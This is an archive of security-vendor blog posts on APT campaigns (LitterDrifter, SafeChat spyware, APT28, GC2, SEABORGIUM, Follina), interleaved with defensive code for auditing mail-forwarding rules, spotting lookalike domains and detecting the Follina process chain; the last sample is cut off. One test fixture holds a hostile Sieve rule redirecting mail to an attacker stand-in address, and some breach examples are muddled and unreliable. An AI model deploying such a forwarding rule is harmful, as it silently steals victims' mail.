APT Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/apt/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

LitterDrifter – Russia’s USB Worm Targeting Ukrainian Entities
https://gridinsoft.com/blogs/litterdrifter-usb-worm/
Wed, 22 Nov 2023 14:34:03 +0000

The LitterDrifter USB worm is intricately linked to the notorious Gamaredon group and originates from Russia. It has set its sights on Ukrainian entities, adding a concerning layer to the already complex world of state-sponsored cyber espionage. This USB worm, believed to be orchestrated by Russian actors, not only showcases the adaptability and innovation of Gamaredon but also raises questions about the potential geopolitical implications of this latest cyber weapon.

Who are Gamaredon?

Gamaredon’s unique profile goes beyond its commitment to espionage goals. The Security Service of Ukraine (SSU) has linked Gamaredon personnel to the Russian Federal Security Service (FSB), adding a geopolitical twist to the group’s activities. That link to the FSB, the agency responsible for counterintelligence, antiterrorism, and military surveillance, sheds light on the strategic and state-sponsored nature of Gamaredon’s operations. Despite the ever-changing landscape of its targets, Gamaredon’s infrastructure exhibits consistent patterns, emphasizing the need for careful scrutiny from cybersecurity experts.

What is LitterDrifter?

One of Gamaredon’s tools is the notorious USB-propagating worm LitterDrifter. This malware, written in VBS, showcases Gamaredon’s adaptability and innovation. Despite the old-fashioned malware type, it packs quite a lot of the functionality needed in modern cyberattacks.

As a part of the APT’s infrastructure, LitterDrifter introduces a global element to Gamaredon’s operations. Beyond its intended targets in Ukraine, this worm has left potential infections in its wake in countries like the USA, Vietnam, Chile, Poland, Germany, and even Hong Kong. The global reach of LitterDrifter adds to the overall potential of the threat actor in globe-scale cyberattacks.

The core functionality of the LitterDrifter worm revolves around acting as a remote access tool. In other words, it is a backdoor with worm-like self-spreading capabilities: a hidden, unauthorized access point in a computer system, software, or network that allows reaching the target environment. In cyberattacks, backdoors mostly act as initial access and reconnaissance tools, which then “open the gates” for further malware injection.

LitterDrifter doesn’t just spread automatically over USB drives; as noted above, its infections have reached well beyond Ukraine, which highlights the broader threat it poses to cybersecurity worldwide.

Gamaredon’s Campaign Against Ukraine

Gamaredon Group has exhibited a sustained and targeted cyber espionage campaign against Ukraine and its institutions since at least 2013, including the military, non-governmental organizations (NGOs), the judiciary, law enforcement, and nonprofit entities. The group, suspected to have ties to Russian cyber espionage efforts, has consistently focused on infiltrating Ukrainian entities, as is evident in its choice of Ukrainian-language lures and primary targets within the region.

LitterDrifter emerges as yet another tool employed by the group in its multifaceted cyber operations. As researchers’ ongoing monitoring and analysis have revealed, Gamaredon has utilized LitterDrifter alongside various other techniques and malware to achieve its objectives. This has further strengthened the group’s status as an advanced persistent threat against Ukrainian and allied interests.

Protection against LitterDrifter

As LitterDrifter reveals its global impact, it prompts a call for a unified and fortified global cybersecurity defense. The worm’s ability to transcend borders underscores the importance of international collaboration in addressing and mitigating cyber threats.

Protecting from threats like LitterDrifter requires a combination of proactive cybersecurity practices and vigilance. Here are some recommendations to enhance your protection against such worms:

  • Be cautious when inserting USB drives into your computer, especially if they are from unknown or untrusted sources. Consider using USB drives that have read-only switches to prevent unauthorized writing.
  • Regularly back up your important data and store backups in a secure location. In the event of a ransomware attack, having recent backups can help you restore your system without paying the ransom.
  • Follow security best practices such as using strong, unique passwords, enabling two-factor authentication, and limiting user privileges. These practices can add layers of protection against various cyber threats.
  • Keep yourself informed about the latest cybersecurity threats and vulnerabilities. Being aware of the evolving threat landscape enables you to adapt your security measures accordingly.

Bahamut APT Targets Users With Fake SafeChat App
https://gridinsoft.com/blogs/bahamut-apt-fake-safechat-app/
Tue, 01 Aug 2023 21:38:06 +0000

Attackers are using a fake SafeChat Android app to attack users in the South Asian region. The malware is designed to steal call logs, text messages, and GPS locations from targeted smartphones. The Indian APT group “Bahamut” is probably behind all this mess.

Bahamut Group Exploits a Phony Android Application

Recently, analysts came across advanced Android malware that targets individuals in the South Asia region. The malware is disguised as a chat app known as “SafeChat,” which victims receive via WhatsApp. Attackers use social engineering and often lure victims into installing the chat app under the pretext of switching to a more secure platform. The app’s interface is typical of all messengers and is not hard to copy from elsewhere, which is why it effectively deceives users into thinking it is legitimate and safe. Meanwhile, it allows the threat actor (TA) to extract all the information they need. The malware exploits Android libraries to extract and transmit data to a command-and-control server.

Figure: fake “Safe Chat” app splash screen. Source: CYFIRMA

It is worth noting that this SafeChat has nothing to do with the legitimate program of the same name, and Bahamut APT does not try to mimic it. Most probably, they picked the name purely as clickbait, making no reference to the app’s legitimacy. Besides, the original app is not well-known enough for its name to work as a disguise.

State-Sponsored Activity

According to technical analysis, the Android spyware appears to be a variation of the well-known Coverlm malware, which is notorious for extracting data from popular communication apps such as Telegram, Signal, WhatsApp, Viber, and Facebook Messenger. The Indian APT group Bahamut is behind the attack. In addition, the malware exhibits tactics similar to those of the notorious APT group DoNot, but with more permissions. Based on substantial evidence, experts have linked Bahamut to acting on behalf of a particular state government in India. Sharing the same certificate authority as the DoNot APT group, similar data-theft methodologies, a common area of operation, and the use of Android apps to infect targets suggest close cooperation or overlap between the two groups.

“Safe Chat” Details

As mentioned above, the Safe Chat app has a misleading interface that gives the impression of a genuine chat application. When first launched, it further manipulates victims by walking them through a seemingly legitimate user registration process, which boosts its credibility and serves as a cover for the embedded spyware. One of the most essential steps in the infection is acquiring permission to use the Accessibility Services: the app uses it to grant additional, and crucial, permissions to the spyware automatically. Access to Accessibility Services allows the spyware to reach the victim’s contact list, SMS, call logs, and external device storage, and to get accurate GPS location data from the infected device.

Safety tips

Although cyber-attacks are not new, it is always wise to be cautious of such incidents and take measures to ensure your safety. The following are some suggestions to safeguard yourself against SafeChat and other types of malware and maintain your Android device’s security:

  • Install Apps from Trusted Sources. For your safety, we recommend that you only download and install apps from official places such as Google Play Store. Please avoid installing apps from unknown sources, which may contain harmful malware.
  • Check App Permissions. It’s essential to be careful when downloading apps that request unnecessary permissions. If an app asks for access to sensitive data or unnecessary features for regular use, think twice before installing it.
  • Keep Your Device Updated. It is essential to regularly update your Android device with the latest software and security patches. Manufacturers release these updates to fix any vulnerabilities and make your device more secure.
  • Use Security Apps. Installing a trustworthy antivirus or security application from a reliable source is recommended to conduct regular scans on your device for potential threats and malware.

APT28 Attacked Ukrainian and Polish Organizations
https://gridinsoft.com/blogs/apt28-attacked-ukrainian-organizations/
Thu, 22 Jun 2023 09:23:34 +0000

Recorded Future, in collaboration with CERT-UA researchers, has unveiled a recent cyber offensive orchestrated by Russian-speaking hackers affiliated with the APT28 Group (also known as Fancy Bear, BlueDelta, Sednit, and Sofacy). Their target: Roundcube mail servers of various Ukrainian organizations, including government entities.

As a reminder, we previously reported on the divergence of hacker groups, some siding with Russia and others with Ukraine. Additionally, Microsoft accused Russia of cyberattacks against Ukraine’s allies.

Recent media coverage also highlighted the arrest of two members of the DoppelPaymer Group by law enforcement in Germany and Ukraine.

The report details that the attackers, employing spear phishing and bait emails, capitalized on the Russian invasion of Ukraine. The hackers crafted spear-phishing emails with news topics related to Ukraine, appearing as legitimate media content.

The campaign demonstrated a high level of readiness by hackers who quickly turned news content into bait for recipients. The spear-phishing emails contained news topics related to Ukraine, with topics and content reflecting legitimate media sources.

Recipients only had to open the malicious messages: the emails exploited old vulnerabilities in Roundcube (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) to compromise unpatched servers, requiring no user interaction with malicious attachments.

The attachment contained JavaScript code that executed additional JavaScript payloads from BlueDelta controlled infrastructure.


If the compromise succeeded, the attackers deployed malicious scripts redirecting incoming messages to an email address under their control. These scripts were also employed to locate and pilfer victims’ address books, session cookies, and other data stored in the Roundcube database.

Researchers suggest that the infrastructure used in these attacks has been active since around November 2021, with APT28‘s activities focused on “gathering military intelligence.”

“We have identified BlueDelta activity, most likely targeted at the regional Ukrainian prosecutor’s office and the [unnamed] central executive body of the country, and also found intelligence activities associated with other Ukrainian state structures and organizations, including those involved in the modernization and repair of infrastructure for the Ukrainian military aviation,” the report states.

This collaboration between Recorded Future and CERT-UA emphasizes the crucial role of partnerships between organizations and governments in ensuring collective defense against strategic threats—particularly in the context of Russia’s ongoing conflict with Ukraine.
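The post-compromise step described above, malicious scripts that redirect a victim’s incoming mail, is something a defender can hunt for directly: Roundcube’s managesieve plugin stores each user’s filters as a Sieve script on the mail server, and a redirect to an address outside the organisation is the signature of this tactic. The following audit is an added example, not code from the article, from Recorded Future or from CERT-UA; the sample script, the rule names and the domain corp.example are constructed for the demonstration.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Roundcube's managesieve plugin labels each filter with a "# rule:[name]" comment.
RULE_MARKER_RE = re.compile(r'^#\s*rule:\[(?P<name>[^\]]*)\]')
# A Sieve "redirect" action, with optional tagged arguments such as :copy before the address.
REDIRECT_RE = re.compile(r'\bredirect\b(?P<flags>(?:\s+:\w+)*)\s*"(?P<addr>[^"]+)"')


@dataclass
class Finding:
    rule_name: str
    target: str
    keeps_copy: bool
    reason: str


def _audit_rule(rule_name: str, body: str, internal: set) -> List[Finding]:
    """Flag every redirect in one rule body whose target domain is not internal."""
    findings = []
    for m in REDIRECT_RE.finditer(body):
        addr = m.group("addr")
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain in internal:
            continue  # forwarding inside the organisation is not what we hunt for here
        keeps_copy = ":copy" in m.group("flags")
        reason = f"redirects mail to external address {addr}"
        if not keeps_copy:
            # Without :copy the message is not delivered locally, so the victim never sees it.
            reason += " and drops the local copy"
        findings.append(Finding(rule_name, addr, keeps_copy, reason))
    return findings


def audit_sieve_script(script: str, internal_domains: Iterable[str]) -> List[Finding]:
    """Split a managesieve script into its rules and audit each one for external redirects."""
    internal = {d.lower() for d in internal_domains}
    findings: List[Finding] = []
    rule_name = "(preamble)"
    body: List[str] = []
    for line in script.splitlines():
        m = RULE_MARKER_RE.match(line.strip())
        if m:
            findings.extend(_audit_rule(rule_name, "\n".join(body), internal))
            rule_name, body = m.group("name"), []
        else:
            body.append(line)
    findings.extend(_audit_rule(rule_name, "\n".join(body), internal))
    return findings


# Constructed sample script: a benign filter, an internal archive copy, and a hostile forward.
SAMPLE_SCRIPT = """require ["fileinto", "copy"];
# rule:[Newsletters]
if header :contains "subject" "newsletter"
{
    fileinto "Newsletters";
}
# rule:[Archive]
if true
{
    redirect :copy "archive@corp.example";
}
# rule:[Sync]
if true
{
    redirect "collector@attacker.invalid";
    stop;
}
"""

if __name__ == "__main__":
    for f in audit_sieve_script(SAMPLE_SCRIPT, ["corp.example"]):
        print(f"[{f.rule_name}] {f.reason}")
```

Run it over every script the managesieve backend stores (one per mailbox) and alert on any finding; a rule that both redirects externally and omits :copy is the highest-priority case, because the mailbox owner has no visible trace of the stolen mail.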

Chinese Hackers Use Google Command & Control Capabilities in Attacks
https://gridinsoft.com/blogs/google-command-and-control/
Thu, 20 Apr 2023 11:28:52 +0000

Google experts have warned that the Chinese “government” hack group APT41 is abusing the red team’s GC2 (Google Command and Control) tool. According to experts, GC2 was used in attacks on Taiwanese media and an unnamed Italian recruiting company.

Let me remind you that we also wrote that Chinese Hackers Injected a Backdoor into the MiMi Messenger, and that Chinese Hackers Use Ransomware As a Cover for Espionage.

Information security specialists also reported that Three Chinese APT Groups Attack Major Telecommunications Companies.

The Google Threat Analysis Group (TAG) links this campaign to the hacker group HOODOO, also known as APT41, Barium, Bronze Atlas, Wicked Panda and Winnti. Typically, this group targets a wide range of industries in the US, Asia, and Europe.

Google Command and Control is an open source project written in Go and developed specifically for the red team.

“This program is designed to provide management and control that does not require any specific configuration (e.g. custom domain, VPS, CDN, etc.) during red team operations. In addition, the program will only interact with Google domains (*.google.com) to make it harder to detect,” says the description in the official project repository on GitHub.

Essentially, the project consists of an agent that is deployed to compromised devices and then connects to a Google Sheets URL to receive commands to execute. The received commands force the agent to download and install additional payloads from Google Drive or, on the contrary, steal data, “uploading” it to the cloud storage.


According to the TAG report, APT41 attacks start from phishing emails containing links to a password-protected file hosted on Google Drive. This file contains GC2, which penetrates the victim’s system.

While it is not known what additional malware was distributed with GC2 this time around, APT41 typically deploys a wide range of malware on compromised systems. For example, a 2019 report by Mandiant explained that attackers use rootkits, bootkits, custom malware, backdoors, PoS malware, and in some cases even ransomware in their campaigns.

The researchers write that this find is notable for two reasons: first, it shows that Chinese hackers are increasingly relying on freely available and open-source tools to make attacks more difficult to attribute. Second, it points to the growing proliferation of malware and tools written in Go, which is popular with attackers due to its cross-platform and modular nature.

Google also warned that “the undeniable importance of cloud services” has made them a profitable target for both “government” hackers and ordinary cybercriminals, who are increasingly using them “either as hosts for malware or as C2 infrastructure”.

Security Breach
https://gridinsoft.com/blogs/what-is-security-breach/
Thu, 05 Jan 2023 16:46:59 +0000

A security breach is an unauthorized access to a device, network, program, or data. Security breaches result from the network or device security protocols being violated or circumvented. Let’s see the types of security breaches, the ways they happen, and methods to counteract security breaches.

What is a Security Breach?

First of all, let’s have a look at the definitions. A security breach is when an intruder bypasses security mechanisms and gets access to data, apps, networks, or devices. Despite their close relationship, there’s a difference between security breaches and data breaches. A security breach is about getting access as such, like breaking into someone’s house. A data breach, on the other hand, is a possible consequence of a security breach: the intruder may pursue goals other than leaking data, so a data breach is one specific outcome of a security breach.

What are the types of Security Breaches?

Threat actors may create a security breach in different ways, depending on their victim and intentions. Here are the most important ones.

1. Malware injection

Cybercriminals often employ malicious software to infiltrate protected systems. Viruses, spyware, and other malicious software are transmitted via email or downloaded from the Internet. For instance, you might receive an email that contains an attachment, generally an MS Office document, and opening that file can end up infecting your PC. You may also download a malicious program from the Internet without any tricks involved. Hackers often target your computer to get money and steal your data, which they can sell on the Darknet or other suitable places.

2. Man-in-the-Middle-attack

As the name says, the assailant sits in the middle of the communication route. A hacker can intercept communications between two parties, so that one party receives a false message, or the entire communication log may be compromised. Such an attack is often carried out through hacked network equipment, such as a router. However, some malware examples may fit that purpose as well.

Figure: scheme of a Man-in-the-Middle attack

3. Insider threat

An insider threat is the danger of a person from within the company using their position and authorized access to commit a cybercrime. The harm can include malicious, negligent, or accidental actions that negatively affect the organization’s security, confidentiality, or availability. Other stakeholders may find this general definition more appropriate and valuable to their organization. CISA defines an insider threat as the danger that an insider will knowingly or unknowingly misuse their authorized access to harm the department’s mission, resources, personnel, facilities, information, equipment, networks, or systems. This danger can manifest through the following insider behaviors:

  • Corruption, including participation in transnational organized crime
  • Terrorism
  • Sabotage
  • Unauthorized disclosure of information

4. Advanced persistent threat

An advanced persistent threat is a persistent cyberattack that employs advanced tactics to remain undetected in a network for an extended time in order to steal information. An APT attack is meticulously planned and executed to infiltrate a specific organization, circumvent existing security measures and remain undetected. APT attacks are more complex and require more advanced planning than traditional cyberattacks. Adversaries are typically well-funded, experienced teams of cybercriminals that target high-value organizations. They devote significant time and resources to investigating and identifying vulnerabilities within the organization.


Examples of Security Breaches

Recent high-profile breaches include:

  • Facebook: In 2021, the personal information of over half a billion Facebook users was leaked, including phone numbers, dates of birth, locations, email addresses, and more. The attack relied on a zero-day exploit that allowed hackers to harvest a large amount of data from the company’s servers.
  • Equifax: In 2017, the US credit bureau Equifax experienced a security breach via a third-party software vulnerability that was similar to the EternalBlue exploit. Fraudsters gained access to the personal information of over 160 million people; this is considered one of the most significant identity-theft cybercrimes to date.
  • Yahoo!: In 2016, 200 million Yahoo! users were active when a list of usernames and passwords for Amazon accounts was posted for sale on the dark web. The company blamed the breach on “state-sponsored hackers” who could manipulate cookie data to gain access to user accounts.
  • eBay: In 2014, eBay experienced a severe security breach resulting in the widespread disclosure of personal information.

How to help Protect yourself from a Security Breach

Monitor your accounts and devices

After a security incident, closely monitor your accounts and devices for any unusual activity. If one is present, ask the site administrator to suspend your account and help prevent the threat actor from accessing it.

Change your passwords

Choose complex passwords on all devices that need configuring. Pay special attention to routers and to situations where you use public Wi-Fi. Remember to update your passwords frequently. A password should include upper- and lower-case letters, numbers, and special characters.

Figure: example of a weak password

Contact your financial institution

Contact your bank immediately to prevent fraudulent transactions if your credit card or other financial information is compromised. They can tell you what the problem is and how to fix it. Sometimes, it may take time to resolve issues with your card. The best thing to do in these cases is to block your card so that fraudsters can’t withdraw money from it.

Perform an antivirus scan

If someone has gained access to your computer or home network, it may be infected with malware. Use reliable antivirus software to identify and remove any threats that may be present. Run an initial scan to determine whether your computer has any issues. Depending on the scan you run, it may take some time to complete: the default is a quick scan, while the standard scan is recommended but takes longer.

Report the incident to the appropriate authorities

Contact your local law enforcement agency if you’ve been the victim of identity theft or fraud. They will assist you in the necessary steps to regain control over your accounts.

You should know that avoiding attacks is possible if you take the proper steps to protect yourself. This requires creating strong passwords, using two-factor authentication, and keeping track of your credentials with a strong password manager.

Figure: 2FA usage minimises the chance of a security breach

Good digital hygiene also includes using comprehensive security and privacy software to prevent threats from infiltrating your devices and to protect your data. This makes it harder for hackers to enter your device, get your data, and sell it on third-party paywalls.

Disrupting SEABORGIUM’s Ongoing Phishing Operations
https://gridinsoft.com/blogs/russian-hack-group-seaborgium/
Thu, 18 Aug 2022 10:36:12 +0000

Microsoft Threat Intelligence Center (MSTIC) experts announce the disruption of an operation conducted by the Russian-speaking hacking group SEABORGIUM, targeting individuals and organizations in NATO countries.

As a reminder, we previously reported the discovery of a new version of malware from Russian hackers called LOLI Stealer.

The APT group, referred to as SEABORGIUM by Microsoft, has been under researchers’ scrutiny since at least 2017. Other companies track SEABORGIUM under names such as COLDRIVER (Google), Callisto Group (F-Secure), and TA446 (Proofpoint). The group is suspected of carrying out cyber-espionage attacks against military personnel, government officials, think tanks, and journalists in NATO countries, the Baltics, Scandinavia, and Eastern Europe.

In target countries, SEABORGIUM primarily focuses its operations on defense, intelligence, and consulting companies, non-governmental and international organizations, think tanks, and universities. SEABORGIUM has been seen in attacks on former intelligence officers, experts on Russia, and Russian citizens abroad.

MSTIC analysts detail that SEABORGIUM members create fake online identities through email, social media, and LinkedIn accounts. These fake identities are then used in social engineering attacks against targeted individuals and organizations.


Operating under these fake personas, attackers initiate contact with targets to establish conversations and eventually send phishing attachments. Microsoft reveals that the hackers distribute emails with PDF attachments, links to file-sharing sites, or OneDrive accounts hosting PDF documents.

Upon opening such a file, the victim encounters a message stating that the document cannot be viewed, and a special button must be pressed to try again.


Clicking the button redirects the victim to a landing page running a phishing framework, such as EvilGinx, displaying a login form. Acting as a proxy, EvilGinx enables hackers to intercept and steal entered credentials, along with cookies/authentication tokens generated after login.

These stolen tokens enable attackers to access the compromised user account, even if the victim has two-factor authentication enabled.

According to Microsoft, once access is gained, hackers either pilfer emails and attachments or set up forwarding rules to receive all incoming emails in the victim’s compromised account. The researchers also observed attackers using a hacked account to negotiate on behalf of the victim to obtain confidential information.

MSTIC reports taking several steps to disrupt SEABORGIUM’s malicious campaign, including disabling accounts used for spying, phishing, and email harvesting.

The company has also shared indicators of compromise, including 69 domains associated with the group’s phishing campaigns, utilized to steal credentials from Microsoft, ProtonMail, and Yandex accounts.

Russian Organizations Under Attack By Chinese APTs
https://gridinsoft.com/blogs/chinese-apts-increasingly-target-russian-organizations/
Fri, 08 Jul 2022 16:03:44 +0000

Unveiling a recent cyber saga, the experts at SentinelLabs have unearthed a menacing digital force strategically honing in on Russian organizations. In their detective work, they have traced the trail back to a Chinese APT group, a finding corroborated by Ukraine CERT (CERT-UA).

The adversaries rely on phishing emails as Trojan horses, delivering malicious Office documents armed with Bisonal, a Remote Access Trojan (RAT) that is a go-to tool for these actors. SentinelLabs observed the same techniques used across borders against unsuspecting victims in Pakistani organizations.

In the grand theater of digital warfare, China has mounted a retaliatory wave of campaigns against Russia following Russia’s invasion of Ukraine.

On June 22nd, 2022, CERT-UA published Alert #4860, presenting several documents built with the Royal Road malicious document builder and crafted to match Russian government interests. SentinelLabs analyzed the CERT-UA report further and confirmed the involvement of a Chinese APT group.

Image: One of the malicious documents distributed in the campaign, Russian telecom theme, “Пояснительная записка к ЗНИ.doc”
Image: Translation of the previous document example

The malicious activity comes amid other Chinese attacks against Russia, such as those by Space Pirates, Mustang Panda and Scarab, but this is a separate Chinese activity cluster. The specific actor’s identity is unclear so far, although it is clear that Chinese APT groups aim at a wide range of different Russian organizations.

Who may be behind the attack?

SentinelLabs specialists speculate that the Tonto Team APT group (also tracked as “Earth Akhlut” and “CactusPete”), which has been reported on for nearly a decade, might be behind the attacks. However, they emphasize that it is premature to draw definitive conclusions from the currently available data.

“The malicious documents are generally used for the delivery of custom malware, such as the Bisonal RAT, which as noted by CERT-UA, is unique to Chinese groups, including Tonto Team. Bisonal has a uniquely long history of use and continued development by its creators, such as expanding features for file searching and exfiltration, anti-analysis and detection techniques, and maintaining generally unrestricted system control,” reads the report published by SentinelLabs.

The Tonto Team APT group has also targeted multiple victims across the globe, with a particular interest in Northeast Asia: private businesses, critical infrastructure, governments and so on. The group has shown interest in Russian targets for years, but specialists recently observed a significant spike of activity in this direction.

“We assess with high confidence that the Royal Road-built malicious documents, delivered malware, and associated infrastructure are attributable to Chinese threat actors. Based on our observations, there’s been a continued effort to target Russian organizations by this cluster through well-known attack methods: the use of malicious documents exploiting n-day vulnerabilities with lures specifically relevant to Russian organizations,” the researchers’ report also states.

On the whole, the purpose of the attacks appears to be espionage, but that assessment is limited by the researchers’ external visibility.

Iranian Spear-Phishing Operation Targets US And Israeli High Executives
https://gridinsoft.com/blogs/iranian-spear-phishing-operation-targets-us-and-israeli-high-executives/
Wed, 15 Jun 2022 14:31:42 +0000

In the wake of rising tensions between Israel and Iran, researchers from Check Point Research (CPR) discovered numerous spear-phishing attempts attributed to the supposedly Iranian Phosphorus APT group.

Researchers also assume that the activity might have started earlier, but so far they have traced it back to at least December 2021. Among the goals of the operation, it is believed, were stealing passport scans, gaining access to email accounts and collecting personal information.

High-profile targets of the operation included:

  • A senior executive working in the Israeli defense industry;
  • A former chair of one of the best-known Middle East research centers;
  • A former US Ambassador to Israel;
  • The chair of one of Israel’s leading security think tanks;
  • A former Major General who held a senior position in the IDF (Israel Defense Forces);
  • Tzipi Livni, former Foreign Minister and Deputy Prime Minister of Israel.

To conduct the attacks, threat actors took control of existing email accounts of senior officials and, posing as them, engaged in long correspondence with targets or inserted themselves into existing conversations between executives and other persons.

It’s not the first time Israeli officials have become targets to Iranian threat actors via email attacks

The spoofed emails used in the attack contained Yahoo-themed phishing pages, links to upload document scans, fake invitations to a conference or research project, or links to real documents relevant to the target.

One of the former high officials, former Israeli Foreign Minister Tzipi Livni, received a faked email that appeared to come from another senior official, a well-known former Major General in the IDF. The email came from a genuine address with which the former Foreign Minister had corresponded in the past: the hijacked account of the former Major General. It contained a link to a file she was asked to open and read.

Image: A phishing email the former Israeli Foreign Minister received

When she postponed the action, she was approached again with another email from the same address asking her again to open the file. This raised the former executive’s suspicions.

Image: Another phishing email Tzipi Livni received

She met the former Major General in person and asked about the emails, which, it turned out, he had never sent.

Iranian Phosphorus APT group is supposedly behind these spear phishing attacks

CPR researchers assume that an Iranian-backed entity is responsible for the attacks. They note that all possible evidence points to the operation of the Iran-attributed Phosphorus APT group.

This well-known group has a long history of targeting high-profile officials, mainly Israeli ones, in support of the interests of the Iranian regime.

How To Recognize Phishing Emails

High-profile officials are not the only phishing targets; ordinary people are targeted as well. To tell whether an email you received is phishing, look for the following signs to confirm or dismiss your suspicions:

  • Fake Domains. If you received an unexpected email and are not sure it is legitimate, the first thing to check is the domain it came from. To avoid drawing your attention, threat actors register domains that at first glance look like the legitimate one but are not.
    For example, you may receive an email from what appears to be your bank’s lionsbank.com domain, but if you look closely you may spot a difference: instead of lionsbank.com it is something like lionsdank.com;
  • Suspicious Requests. Phishing emails exist to steal your personal information, money and credentials. If you are asked to hand over any of those, or receive other unusual or suspicious requests, you are almost certainly dealing with a phishing email;
  • Psychological Tricks. If the email reads as coercive, you are most likely dealing with phishing. Phishers urge you to act, and may even threaten legal consequences if you do not do what the email asks.
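The fake-domain check above can be automated at an inbox or mail gateway. The following Python is an added example, not code from the original post: it normalizes the sender’s domain (folding digits and letter pairs that imitate other glyphs), compares it against a constructed list of trusted domains by edit distance, and also catches a trusted brand name buried inside a longer hostile hostname. The trusted list and the sample addresses are constructed; lionsbank.com and lionsdank.com are the post’s own example.

```python
"""Lookalike sender-domain check.

Added example, not code from the original post. It implements the
"fake domain" sign described above: a sender domain that is one edit or
one homoglyph away from a domain the reader trusts is flagged. The trusted
list and the sample addresses are constructed for illustration.
"""
import re
import unicodedata

# Constructed: domains this reader legitimately receives mail from.
TRUSTED_DOMAINS = {"lionsbank.com", "protonmail.com", "yahoo.com"}

# Digits and letter pairs that attackers swap for visually similar glyphs.
DIGIT_FOLD = str.maketrans("01357", "olest")
PAIR_FOLD = (("rn", "m"), ("vv", "w"))


def normalize(domain: str) -> str:
    """Lower-case, strip accents and fold common look-alike characters."""
    d = unicodedata.normalize("NFKD", domain.strip().lower().rstrip("."))
    d = "".join(ch for ch in d if not unicodedata.combining(ch))
    for pair, single in PAIR_FOLD:
        d = d.replace(pair, single)
    return d.translate(DIGIT_FOLD)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(address: str) -> str:
    """Domain part of 'Name <user@host>' or 'user@host'; '' if none found."""
    m = re.search(r"@([A-Za-z0-9.\-]+)>?\s*$", address)
    return m.group(1).lower() if m else ""


def classify_sender(address: str, trusted=TRUSTED_DOMAINS) -> str:
    """Return 'trusted', 'lookalike of X', 'contains X', 'unknown' or 'unparseable'."""
    dom = sender_domain(address)
    if not dom:
        return "unparseable"
    if dom in trusted:
        return "trusted"
    norm = normalize(dom)
    for t in sorted(trusted):
        # Distance 0 after folding (yah00.com) or one edit (lionsdank.com).
        if edit_distance(norm, normalize(t)) <= 1:
            return f"lookalike of {t}"
        brand = t.split(".")[0]
        if brand in norm:  # e.g. lionsbank.com.evil.example or lionsbank-login.com
            return f"contains {brand}"
    return "unknown"


if __name__ == "__main__":
    # Constructed sample senders.
    for addr in ("Lions Bank <alerts@lionsbank.com>", "alerts@lionsdank.com",
                 "support@l1onsbank.com", "no-reply@yah00.com",
                 "alerts@lionsbank.com.evil.example", "bob@example.org"):
        print(f"{addr:45} -> {classify_sender(addr)}")
```

Anything other than `trusted` or `unknown` deserves a look at the full headers before the message is acted on; the check is deliberately biased toward flagging, since the cost of a false alarm is a few seconds of attention.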

What Other Signs Hint At Phishing

First of all, the received email gives you a sense of urgency. Recipients are told that something needs to be done right away or they will face unpleasant consequences. This is done because a person in a hurry is less likely to question whether the email is genuine.

The second popular phishing trick is to send the email in the name of an authority figure. In this case threat actors most often run business email compromise (BEC) scams and similar spear-phishing tricks, in which the message is disguised as coming from a CEO or someone else in authority.

Phishing emails with this tone work because people are often too inclined to take an email from someone in authority as genuine.

Another popular method among threat actors, though usually not among those targeting high-profile persons, is to threaten or blackmail the recipient.

They demand that the recipient do as they ask, threatening otherwise to leak sensitive information or destroy other valuable data.

Fear is what makes such phishing attempts succeed. People are afraid of being punished or embarrassed, and that is what makes them comply with the phishers’ requests.

And the last thing to mention is that if you suspect that the email you received might be phishing it will be better not to do anything with it. Don’t open any attachments, don’t click on any links in it and, of course, don’t reply with anything.

It will be better just to delete that email or report to the IT team if you received such an email at work.

Attackers Exploit MSDT Follina Bug to Drop RAT
https://gridinsoft.com/blogs/threat-actors-exploit-msdt-follina-bug-to-drop-rat-and-infostealer/
Thu, 09 Jun 2022 10:09:21 +0000

Security specialists caution users about the exploitation of the recently disclosed Follina Bug found in all supported versions of Windows. Threat actors have actively utilized this vulnerability to install payloads such as the AsyncRAT trojan and infostealer.

Understanding the Follina Vulnerability

On May 27, 2022, the public became aware of a remote code execution (RCE) vulnerability, known as Follina. Soon after its disclosure, experts observed several instances of exploitation.

Follina (CVE-2022-30190) is a vulnerability identified in the Microsoft Support Diagnostic Tool (MSDT), enabling RCE on all susceptible systems. The exploitation occurs via the ms-msdt protocol handler scheme.

To exploit Follina, threat actors do not need to entice victims into enabling macros. Instead, they deploy a specially crafted Word document.

This document, through Word’s template feature, downloads and loads a malicious HTML file. Consequently, threat actors gain the ability to execute PowerShell code within targeted Windows systems.

Microsoft has issued multiple workarounds and advisories to mitigate the vulnerability’s risk.

Functioning of the Follina Vulnerability

Upon the dissemination of this vulnerability’s details online, threat actors eagerly commenced the installation of their payloads.

For a successful Follina exploit, the crafted document opened in WinWord retrieves an HTML file, and its execution makes winword.exe launch the msdt.exe process as a child process.


The ms-msdt protocol handler entry in the registry is what allows msdt.exe to be launched this way. msdt.exe then starts sdiagnhost.exe, the Scripted Diagnostics Native Host, which runs the final payload; in Follina’s case, PowerShell.
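The parent/child chain just described (an Office process launching msdt.exe through the ms-msdt: scheme, msdt.exe launching sdiagnhost.exe, and sdiagnhost.exe launching PowerShell) is something a defender can look for in process-creation telemetry. The following Python is an added example, not code from the original post or from Microsoft: it uses the Sysmon Event ID 1 field names (Image, ParentImage, CommandLine, ProcessGuid, ParentProcessGuid), but the GUIDs, paths and command lines in the sample log are constructed and the diagnostic ids are placeholders.

```python
"""Detecting the Follina process chain in process-creation events.

Added example, not part of the original post. SAMPLE_LOG is a constructed
JSON Lines log of Sysmon Event ID 1 (process creation) records using the
real Sysmon field names; GUIDs, paths, users and command lines are invented.
Lines 1-4 form a Follina chain; line 5 is a user starting a troubleshooter
from the desktop and must not alert.
"""
import json
from typing import Dict, List

OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

SAMPLE_LOG = r"""
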